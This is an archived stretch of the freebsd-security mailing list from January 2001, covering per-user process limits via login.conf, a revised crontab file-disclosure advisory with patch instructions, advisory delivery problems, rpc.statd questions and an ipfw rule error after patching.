Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Thank you all kindly. I am the kind of newbie who has a few brain cells left, and little hints like a file existing called "login.conf" and the man works on it was a great help. Also thanks for the tips here, I had it set for 2 and might bump it up to 5. I got the idea of background process from a web-site that sells shell accounts. http://www.digital-galaxy.net/index2.htm They sell based on HDD space as well as background processes. Thanks again for everyone's help. Sincerely, Allen Edwards Sr. Applications Engineer Acucomm, Inc. Allen.Edwards@Acucomm.com AIM: AllenDWE ICQ# 54890016 -----Original Message----- From: owner-freebsd-security@FreeBSD.ORG [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Peter Pentchev Sent: Thursday, January 25, 2001 2:14 PM To: Allen Edwards Cc: freebsd-security@FreeBSD.ORG Subject: Re: Newbie Post - Limiting processes On Thu, Jan 25, 2001 at 01:31:42PM -0500, Allen Edwards wrote: > Feel free to flame the newbie if he asks an off topic question (great now > I'm talking about myself in the 3rd person). > > Is there a way to limit a user to a certain number of processes? e.g. one > foreground and one background process. > > I am working on providing some shell accounts to a few clients who have > requested it and have heard of persons doing this. Well, you can limit the total number of processes a user is allowed to run at any given time, background or foreground alike. Look at the login.conf(5) manpage; you can define a custom login class for your shell users, so that limits are only enforced for them, and not for your privileged admin logins. 'maxproc' is the setting for the total number of processes; I don't think you can control the number of background processes, but if your users happen to run too many of those, they will not even be able to login later :) Actually, *one* foreground process is a bit too much - you need at least one for the shell and one for any program the user might run. Each shell pipe and/or other program fork is one more process. So.. tread lightly :) G'luck, Peter -- I've heard that this sentence is a rumor. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 25 11:40: 8 2001 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id CE69637B6B4 for ; Thu, 25 Jan 2001 11:39:45 -0800 (PST) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id UAA90705; Thu, 25 Jan 2001 20:39:37 +0100 (CET) (envelope-from des@ofug.org) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: "Allen Edwards" Cc: Subject: Re: Newbie Post - Limiting processes References: From: Dag-Erling Smorgrav Date: 25 Jan 2001 20:39:36 +0100 In-Reply-To: "Allen Edwards"'s message of "Thu, 25 Jan 2001 14:26:52 -0500" Message-ID: Lines: 11 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Allen Edwards" writes: > They sell based on HDD space as well as background processes. Without reading their site, I imagine that what they mean by "background processes" are processes that run while the user is not logged in (usually these are IRC proxies or various kinds of file transfer clients). DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 25 11:41:18 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.189]) by hub.freebsd.org (Postfix) with SMTP id DB12237B6B6 for ; Thu, 25 Jan 2001 11:40:55 -0800 (PST) Received: (qmail 2322 invoked by uid 1000); 25 Jan 2001 19:39:24 -0000 Date: Thu, 25 Jan 2001 21:39:24 +0200 From: Peter Pentchev To: Allen Edwards Cc: freebsd-security@FreeBSD.ORG Subject: Re: Newbie Post - Limiting processes Message-ID: <20010125213924.E1122@ringworld.oblivion.bg> Mail-Followup-To: Allen Edwards , freebsd-security@FreeBSD.ORG References: <20010125211418.B1122@ringworld.oblivion.bg> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from aedwards@hiqinternet.com on Thu, Jan 25, 2001 at 02:26:52PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Jan 25, 2001 at 02:26:52PM -0500, Allen Edwards wrote: > Thank you all kindly. I am the kind of newbie who has a few brain cells > left, and little hints like a file existing called "login.conf" and the man > works on it was a great help. Also thanks for the tips here, I had it set > for 2 and might bump it up to 5. > > I got the idea of background process from a web-site that sells shell > accounts. > > http://www.digital-galaxy.net/index2.htm > > They sell based on HDD space as well as background processes. > > Thanks again for everyone's help. An additional point. You can limit the number of background processes with some daemon which wakes up periodically, then either does a ps, or uses libkvm to gather process info, and looks for such. It's something that's not too hard to do in Perl.. there are some race conditions to bear in mind, but writing a mostly-working version won't be too hard. You might also want to do something like: find /tmp/screens -type s -ls and add this to the background processes' number. This is a quite commonly used trick - running processes inside a detached screen session. How to detect *which* processes are actually run within that particular session.. well, the filename of the screen socket is easily parseable into a pid - in the already-built process tree, look for children of that pid, and add *them*, too, to the backgnd processes you might want to kill. For a very primitive example of building a process tree in a Perl script, look at the sysutils/pslist port. G'luck, Peter -- This inert sentence is my body, but my soul is alive, dancing in the sparks of your brain. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 25 11:44:25 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.189]) by hub.freebsd.org (Postfix) with SMTP id 0772E37B6B4 for ; Thu, 25 Jan 2001 11:44:06 -0800 (PST) Received: (qmail 2354 invoked by uid 1000); 25 Jan 2001 19:42:35 -0000 Date: Thu, 25 Jan 2001 21:42:35 +0200 From: Peter Pentchev To: Dag-Erling Smorgrav Cc: Allen Edwards , freebsd-security@FreeBSD.ORG Subject: Re: Newbie Post - Limiting processes Message-ID: <20010125214235.F1122@ringworld.oblivion.bg> Mail-Followup-To: Dag-Erling Smorgrav , Allen Edwards , freebsd-security@FreeBSD.ORG References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from des@ofug.org on Thu, Jan 25, 2001 at 08:39:36PM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Jan 25, 2001 at 08:39:36PM +0100, Dag-Erling Smorgrav wrote: > "Allen Edwards" writes: > > They sell based on HDD space as well as background processes. > > Without reading their site, I imagine that what they mean by > "background processes" are processes that run while the user is not > logged in (usually these are IRC proxies or various kinds of file > transfer clients). I've seen a shell provider or five that considers a process to be a background process when it does not have a controlling tty. It's in such cases that people tend to use the screen workaround I mentioned in another mail in this thread. G'luck, Peter -- This sentence contradicts itself - or rather - well, no, actually it doesn't! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 25 12:33:13 2001 Delivered-To: freebsd-security@freebsd.org Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by hub.freebsd.org (Postfix) with ESMTP id 8E8DA37B69C for ; Thu, 25 Jan 2001 12:32:54 -0800 (PST) Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by mohegan.mohawk.net (8.9.3/8.9.3) with ESMTP id PAA78093; Thu, 25 Jan 2001 15:39:10 -0500 (EST) (envelope-from rjh@mohawk.net) Date: Thu, 25 Jan 2001 15:39:10 -0500 (EST) From: Ralph Huntington To: Allen Edwards Cc: freebsd-security@FreeBSD.ORG Subject: Re: Newbie Post - Limiting processes In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This question and the follow-ups belong on questions@FreeBSD.org and not on security. Thank you. -=r=- On Thu, 25 Jan 2001, Allen Edwards wrote: > Feel free to flame the newbie if he asks an off topic question (great now > I'm talking about myself in the 3rd person). > > Is there a way to limit a user to a certain number of processes? e.g. one > foreground and one background process. > > I am working on providing some shell accounts to a few clients who have > requested it and have heard of persons doing this. > > Sincerely, > Allen Edwards > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 25 13: 2: 6 2001 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id B8F8D37B69B; Thu, 25 Jan 2001 13:01:37 -0800 (PST) Received: (from kris@localhost) by freefall.freebsd.org (8.11.1/8.11.1) id f0PL1bs78217; Thu, 25 Jan 2001 13:01:37 -0800 (PST) (envelope-from security-advisories@FreeBSD.org) Date: Thu, 25 Jan 2001 13:01:37 -0800 (PST) Message-Id: <200101252101.f0PL1bs78217@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: kris set sender to security-advisories@FreeBSD.org using -f From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Security Advisory: FreeBSD-SA-01:09.crontab [REVISED] Reply-To: security-advisories@FreeBSD.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-01:09 Security Advisory FreeBSD, Inc. Topic: crontab allows users to read certain files [REVISED] Category: core Module: crontab Announced: 2001-01-23 Revised: 2001-01-25 Credits: Kyong-won Cho Patch obtained from OpenBSD (Todd Miller ) Affects: FreeBSD 3.x (all releases), 4.x (all releases prior to 4.2) FreeBSD 3.5.1-STABLE and 4.1.1-STABLE prior to the correction date. Corrected: 2000-11-11 (FreeBSD 4.1.1-STABLE) 2000-11-20 (FreeBSD 3.5.1-STABLE) FreeBSD only: No 0. Revision History v1.0 2001-01-23 Initial release v1.1 2001-01-25 Update to credit OpenBSD as source of patch I. Background crontab(8) is a program to edit crontab(5) files for use by the cron daemon, which schedules jobs to run at specified times. II. Problem Description crontab(8) was discovered to contain a vulnerability that may allow local users to read any file on the system that conform to a valid crontab(5) file syntax. Due to crontab(5) syntax requirements, the files that may be read is limited and subject to the following restrictions: * The file is a valid crontab(5) file, or: * The file is entirely commented out; every line contains either only whitespace, or begins with a '#' character. The greatest security vulnerability is the disclosure of crontab entries owned by other users, which may contain sensitive data such as keying material (although this would often be publically disclosed anyway at the time when the crontab job executes, via process arguments and environment, etc). All released versions of FreeBSD prior to the correction date including FreeBSD 4.1.1 are vulnerable to this problem. The problem was corrected prior to the release of FreeBSD 4.2. III. Impact Malicious local users can read arbitrary local files that conform to a valid crontab file syntax. IV. Workaround One of the following: 1) Utilize crontab allow/deny files (/var/cron/allow and /var/cron/deny) to limit access to use the crontab(8) utility. 2) Remove the setuid privileges from /usr/sbin/crontab. However, this will not allow users other than root to use cron. V. Solution One of the following: Upgrade the vulnerable FreeBSD system to 3.5-STABLE or 4.1.1-STABLE after the correction date. To patch your present system: download the relavent patch from the below location and execute the following commands as root: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:09/crontab-4.x.patch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:09/crontab-4.x.patch.asc Verify the detached PGP signature using your PGP utility. # cd /usr/src/usr.sbin/cron/crontab # patch -p < /path/to/patch # make depend && make all install -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iQCVAwUBOnCTnVUuHi5z0oilAQGinAP8DtcJTo/0t/ajgbhccOSGMm9DHCN+jsou Nw+3rH07ImrSgeIyINi8d2J+tPL2eakesXm2yKOniuS25PoJN/GuzMC9Qvfybkvg cmKz3f4Fbzu9auWUUx2c+7GZargpGPRjxuNt86RucYswWjTT96MLs0ORGo9hZbXr F0kM+1EZoTg= =ONjc -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 25 13:12:57 2001 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D9F3437B402; Thu, 25 Jan 2001 13:12:35 -0800 (PST) Received: (from kris@localhost) by freefall.freebsd.org (8.11.1/8.11.1) id f0PLCZD81235; Thu, 25 Jan 2001 13:12:35 -0800 (PST) (envelope-from kris) Date: Thu, 25 Jan 2001 13:12:35 -0800 From: FreeBSD Security Advisories To: freebsd-security@freebsd.org Subject: HEADS UP: Problem with advisory delivery Message-ID: <20010125131235.A81121@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hi all, There is something apparently broken with majordomo which is causing it to reject two of the recent advisories from being sent to the FreeBSD lists. Security advisories SA-01:07 and SA-01:10 are released (and made it to bugtraq), but have not shown up on the lists yet, despite re-sending. They'll be sent out as soon as jmb or someone can sort out the problem, in the meantime you can obtain them here: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-01:07.xfree86.asc ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-01:10.bind.asc Sorry for the inconvenience Kris -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iQCVAwUBOnCW71UuHi5z0oilAQFJlwP+Jc3CCnHwYBAhX5eXGBlXlqr5A15pQEWU G5xB3bPLLRIrAyRxBZaceIIKdxxZWaVQg2zzS4OWZtDtwJpePPeKtCUcHVCK39O5 IPO9zG1KdS+n0PwtlCM+vuSRSFfnKDARiKc16sxG3+MDmTgJFTkd7DAGstP80/Yf /VKZu6eAKfg= =ptHS -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 25 13:14:31 2001 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 3F25437B402 for ; Thu, 25 Jan 2001 13:14:13 -0800 (PST) Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id f0PLHVr62727; Thu, 25 Jan 2001 13:17:31 -0800 (PST) (envelope-from kris) Date: Thu, 25 Jan 2001 13:17:31 -0800 From: Kris Kennaway To: "Geoffrey T. Falk" Cc: freebsd-security@FreeBSD.ORG Subject: Re: rpc.statd bloat Message-ID: <20010125131731.A62681@citusc17.usc.edu> References: <200101251726.f0PHQei65827@troutmask.apl.washington.edu> <200101251810.LAA04410@h-209-91-79-2.gen.cadvision.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="KsGdsel6WgEHnImy" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200101251810.LAA04410@h-209-91-79-2.gen.cadvision.com>; from gtf@cirp.org on Thu, Jan 25, 2001 at 11:10:25AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --KsGdsel6WgEHnImy Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Thu, Jan 25, 2001 at 11:10:25AM -0700, Geoffrey T. Falk wrote: > In a related note: Is it normal for rpc.statd to bloat? rpc.statd on > boojum, my 4.0-RELEASE box, recently experienced a VSIZE > 274000. >=20 > This box is an NFS server, but I don't think my NFS client (NEXTSTEP=20 > 3.2) is using rpc.statd, because it runs just fine without it. Yes. It's not actually using that memory. See the archives or the FAQ for more. Kris --=20 NOTE: To fetch an updated copy of my GPG key which has not expired, finger kris@FreeBSD.org --KsGdsel6WgEHnImy Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6cJfrWry0BWjoQKURAgoCAKCxVnIun0vemHTX9ZaW5ooeVUL0EgCg3U6E 7F3cB6ajZAaSVI02rIH8DSQ= =3KZb -----END PGP SIGNATURE----- --KsGdsel6WgEHnImy-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 25 13:37:18 2001 Delivered-To: freebsd-security@freebsd.org Received: from harmony.village.org (rover.village.org [204.144.255.66]) by hub.freebsd.org (Postfix) with ESMTP id 11D1437B6A3 for ; Thu, 25 Jan 2001 13:37:01 -0800 (PST) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.11.1/8.11.1) with ESMTP id f0PLZg974354; Thu, 25 Jan 2001 14:35:42 -0700 (MST) (envelope-from imp@harmony.village.org) Message-Id: <200101252135.f0PLZg974354@harmony.village.org> To: Cy Schubert - ITSD Open Systems Group Subject: Re: Where did FreeBSD-SA-01:07 and 10 go? Cc: Andrey Lakhno , Jan Conrad , security@FreeBSD.ORG In-reply-to: Your message of "Thu, 25 Jan 2001 06:17:10 PST." <200101251417.f0PEHKk14619@cwsys.cwsent.com> References: <200101251417.f0PEHKk14619@cwsys.cwsent.com> Date: Thu, 25 Jan 2001 14:35:42 -0700 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <200101251417.f0PEHKk14619@cwsys.cwsent.com> Cy Schubert - ITSD Open Systems Group writes: : I saw them on BUGTRAQ but not on -security or -announce They aren't in the announce archives. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 25 14: 8: 0 2001 Delivered-To: freebsd-security@freebsd.org Received: from cithaeron.argolis.org (bgm-24-94-35-22.stny.rr.com [24.94.35.22]) by hub.freebsd.org (Postfix) with ESMTP id 6869D37B401 for ; Thu, 25 Jan 2001 14:07:32 -0800 (PST) Received: from localhost (piechota@localhost) by cithaeron.argolis.org (8.11.1/8.11.1) with ESMTP id f0PM7AH27295; Thu, 25 Jan 2001 17:07:10 -0500 (EST) (envelope-from piechota@argolis.org) X-Authentication-Warning: cithaeron.argolis.org: piechota owned process doing -bs Date: Thu, 25 Jan 2001 17:07:09 -0500 (EST) From: Matt Piechota To: "Steven G. Kargl" Cc: Subject: Re: buffer overflows in rpc.statd? In-Reply-To: <200101251726.f0PHQei65827@troutmask.apl.washington.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 25 Jan 2001, Steven G. Kargl wrote: > Are there any known compromises of rpc.statd that involve > buffer overflows? I have several entries in /var/log/messages that > look suspicious, but I currently don't know what these entries > mean (see attachment). The suspicious entries appear to be > buffers that someone or something has tried to overflow. I just read a news iten (on www.theregister.co.uk) talking about the Ramen worm that affects Redhat 6.2 and 7.0. One of the exploits it uses is to overrun something in rpc.statd. The URL to the story is http://www.theregister.co.uk/content/6/16375.html, which has a link to the RedHat security advisories. -- Matt Piechota Finger piechota@emailempire.com for PGP key AOL IM: cithaeron To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 25 14:27:50 2001 Delivered-To: freebsd-security@freebsd.org Received: from atlrel1.hp.com (atlrel1.hp.com [156.153.255.210]) by hub.freebsd.org (Postfix) with ESMTP id 4D70B37B400 for ; Thu, 25 Jan 2001 14:27:33 -0800 (PST) Received: from security.hp.com (cranston.fc.hp.com [15.1.44.224]) by atlrel1.hp.com (Postfix) with ESMTP id BF5C5B38 for ; Thu, 25 Jan 2001 17:27:32 -0500 (EST) Received: from cranston.fc.hp.com (cranston.fc.hp.com [15.1.44.224]) by security.hp.com (Postfix) with ESMTP id E86FB1872C; Thu, 25 Jan 2001 15:27:29 -0700 (MST) To: freebsd-security@freebsd.org Cc: lamont@hp.com Subject: Re: HEADS UP: Problem with advisory delivery In-reply-to: Your message of "Thu, 25 Jan 2001 13:12:35 PST." <20010125131235.A81121@freefall.freebsd.org> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-ID: <2807.980461648.1@cranston.fc.hp.com> Date: Thu, 25 Jan 2001 15:27:28 -0700 From: LaMont Jones Message-Id: <20010125222729.E86FB1872C@security.hp.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > There is something apparently broken with majordomo which is causing > it to reject two of the recent advisories from being sent to the > FreeBSD lists. Security advisories SA-01:07 and SA-01:10 are released > (and made it to bugtraq), but have not shown up on the lists yet, > despite re-sending. The only bounces I've seen (from first-teams) are due to hop-counts being exceeded: (total of 16 Received: headers - they're way too low, but that could be part of your problem...) lamont ... Received: from security.hp.com (cranston.fc.hp.com [15.1.44.224]) by atlrel2.hp.com (Postfix) with ESMTP id A7A4115B3; Thu, 25 Jan 2001 16:13:45 -0500 (EST) Received: by security.hp.com (Postfix) id 5C7A41872C; Thu, 25 Jan 2001 14:13:43 -0700 (MST) Delivered-To: first-teams.out@security.hp.com Received: by security.hp.com (Postfix, from userid 500) id 238C71872E; Thu, 25 Jan 2001 14:13:43 -0700 (MST) Delivered-To: first-teams@first.hp.com Received: from onet2.cup.hp.com (onet2.cup.hp.com [15.75.208.47]) by security.hp.com (Postfix) with ESMTP id 3BEA91872C for ; Thu, 25 Jan 2001 14:13:41 -0700 (MST) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by onet2.cup.hp.com (Postfix) with ESMTP id B8B7418CA0 for ; Thu, 25 Jan 2001 13:13:40 -0800 (PST) Received: from hub.freebsd.org (hub.FreeBSD.org [216.136.204.18]) by mx1.FreeBSD.org (Postfix) with ESMTP id CD1376E2B32; Thu, 25 Jan 2001 13:13:05 -0800 (PST) Received: by hub.freebsd.org (Postfix, from userid 538) id 00E8037B698; Thu, 25 Jan 2001 13:12:58 -0800 (PST) Received: from localhost (localhost [127.0.0.1]) by hub.freebsd.org (Postfix) with SMTP id 243402E8199; Thu, 25 Jan 2001 13:12:56 -0800 (PST) Received: by hub.freebsd.org (bulk_mailer v1.12); Thu, 25 Jan 2001 13:12:55 -0800 Delivered-To: freebsd-security-notifications@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D9F3437B402; Thu, 25 Jan 2001 13:12:35 -0800 (PST) Received: (from kris@localhost) by freefall.freebsd.org (8.11.1/8.11.1) id f0PLCZD81235; Thu, 25 Jan 2001 13:12:35 -0800 (PST) (envelope-from kris) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 25 17: 5: 6 2001 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 12CEB37B6A1 for ; Thu, 25 Jan 2001 17:04:48 -0800 (PST) Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id f0Q186966162; Thu, 25 Jan 2001 17:08:06 -0800 (PST) (envelope-from kris) Date: Thu, 25 Jan 2001 17:08:05 -0800 From: Kris Kennaway To: LaMont Jones Cc: freebsd-security@FreeBSD.ORG Subject: Re: HEADS UP: Problem with advisory delivery Message-ID: <20010125170805.C65768@citusc17.usc.edu> References: <20010125131235.A81121@freefall.freebsd.org> <20010125222729.E86FB1872C@security.hp.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="kVXhAStRUZ/+rrGn" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010125222729.E86FB1872C@security.hp.com>; from lamont@hp.com on Thu, Jan 25, 2001 at 03:27:28PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --kVXhAStRUZ/+rrGn Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Thu, Jan 25, 2001 at 03:27:28PM -0700, LaMont Jones wrote: > > There is something apparently broken with majordomo which is causing > > it to reject two of the recent advisories from being sent to the > > FreeBSD lists. Security advisories SA-01:07 and SA-01:10 are released > > (and made it to bugtraq), but have not shown up on the lists yet, > > despite re-sending. >=20 > The only bounces I've seen (from first-teams) are due to hop-counts > being exceeded: (total of 16 Received: headers - they're way too low, > but that could be part of your problem...) No, these are sent from hub.freebsd.org to hub (where majordomo lives) and being rejected there; they're not even making it into the mailing list archives, which are also archived locally. Kris --=20 NOTE: To fetch an updated copy of my GPG key which has not expired, finger kris@FreeBSD.org --kVXhAStRUZ/+rrGn Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6cM31Wry0BWjoQKURAo68AKC9XIFkArs5gWi3uMUitkpNknt4CgCfdnGk i4d3bStLBECfRpjI0i7nS94= =/hMb -----END PGP SIGNATURE----- --kVXhAStRUZ/+rrGn-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 25 19:19:30 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.gmx.net (pop.gmx.net [194.221.183.20]) by hub.freebsd.org (Postfix) with SMTP id F013037B69F for ; Thu, 25 Jan 2001 19:19:08 -0800 (PST) Received: (qmail 29585 invoked by uid 0); 26 Jan 2001 03:19:10 -0000 Received: from pd950884c.dip.t-dialin.net (HELO speedy.gsinet) (217.80.136.76) by mail.gmx.net (mail02) with SMTP; 26 Jan 2001 03:19:10 -0000 Received: (from sittig@localhost) by speedy.gsinet (8.8.8/8.8.8) id VAA01304 for freebsd-security@freebsd.org; Thu, 25 Jan 2001 21:41:20 +0100 Date: Thu, 25 Jan 2001 21:41:20 +0100 From: Gerhard Sittig To: freebsd-security@freebsd.org Subject: Re: Newbie Post - Limiting processes Message-ID: <20010125214120.M253@speedy.gsinet> Mail-Followup-To: freebsd-security@freebsd.org References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: ; from aedwards@hiqinternet.com on Thu, Jan 25, 2001 at 01:31:42PM -0500 Organization: System Defenestrators Inc. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Jan 25, 2001 at 13:31 -0500, Allen Edwards wrote: > > Is there a way to limit a user to a certain number of > processes? e.g. one foreground and one background process. You mean like in "man login.conf" and search for "proc"? virtually yours 82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76 Gerhard Sittig true | mail -s "get gpg key" Gerhard.Sittig@gmx.net -- If you don't understand or are scared by any of the above ask your parents or an adult to help you. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 25 21:56:46 2001 Delivered-To: freebsd-security@freebsd.org Received: from athena.za.net (athena.za.net [196.30.167.200]) by hub.freebsd.org (Postfix) with ESMTP id B945937B400; Thu, 25 Jan 2001 21:56:23 -0800 (PST) Received: from localhost (jus@localhost) by athena.za.net (8.9.3/8.9.3) with ESMTP id GAA00412; Fri, 26 Jan 2001 06:00:24 GMT (envelope-from jus@security.za.net) X-Authentication-Warning: athena.za.net: jus owned process doing -bs Date: Fri, 26 Jan 2001 08:00:04 +0200 (SAST) From: Justin Stanford X-Sender: jus@athena.za.net To: questions@freebsd.org Cc: security@freebsd.org Subject: ipfw security patch problem.. Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, I upgraded my ipfw yesterday on my 4.0-STABLE system with the patch by following the instructions to the letter for the security bug discovered by Aragon Gouveia, and compile and install appeared to go seamlessly. However, ipfw now gives me this type of problem: [root@athena]~# ipfw add 5000 deny tcp from any to 196.30.167.200 515 via rl0 05000 deny tcp from any to 196.30.167.200 515 via rl0 ip_fw_ctl: empty interface name ipfw: setsockopt(IP_FW_ADD): Invalid argument [root@athena]~# The interface is most definitely rl0, and this exact ruleset is the same I have been using for ages with my previous ipfw. Suggestions? -- Justin Stanford 082 7402741 jus@security.za.net www.security.za.net IT Security and Solutions To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 25 22: 6:29 2001 Delivered-To: freebsd-security@freebsd.org Received: from elvis.mu.org (elvis.mu.org [207.154.226.10]) by hub.freebsd.org (Postfix) with ESMTP id 726BB37B69C; Thu, 25 Jan 2001 22:06:09 -0800 (PST) Received: by elvis.mu.org (Postfix, from userid 1098) id 0527F2B54D; Fri, 26 Jan 2001 00:05:58 -0600 (CST) Date: Fri, 26 Jan 2001 00:05:58 -0600 From: Bill Fumerola To: Justin Stanford Cc: questions@freebsd.org, security@freebsd.org Subject: Re: ipfw security patch problem.. Message-ID: <20010126000558.I57121@elvis.mu.org> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from jus@security.za.net on Fri, Jan 26, 2001 at 08:00:04AM +0200 X-Operating-System: FreeBSD 4.2-FEARSOME-20001103 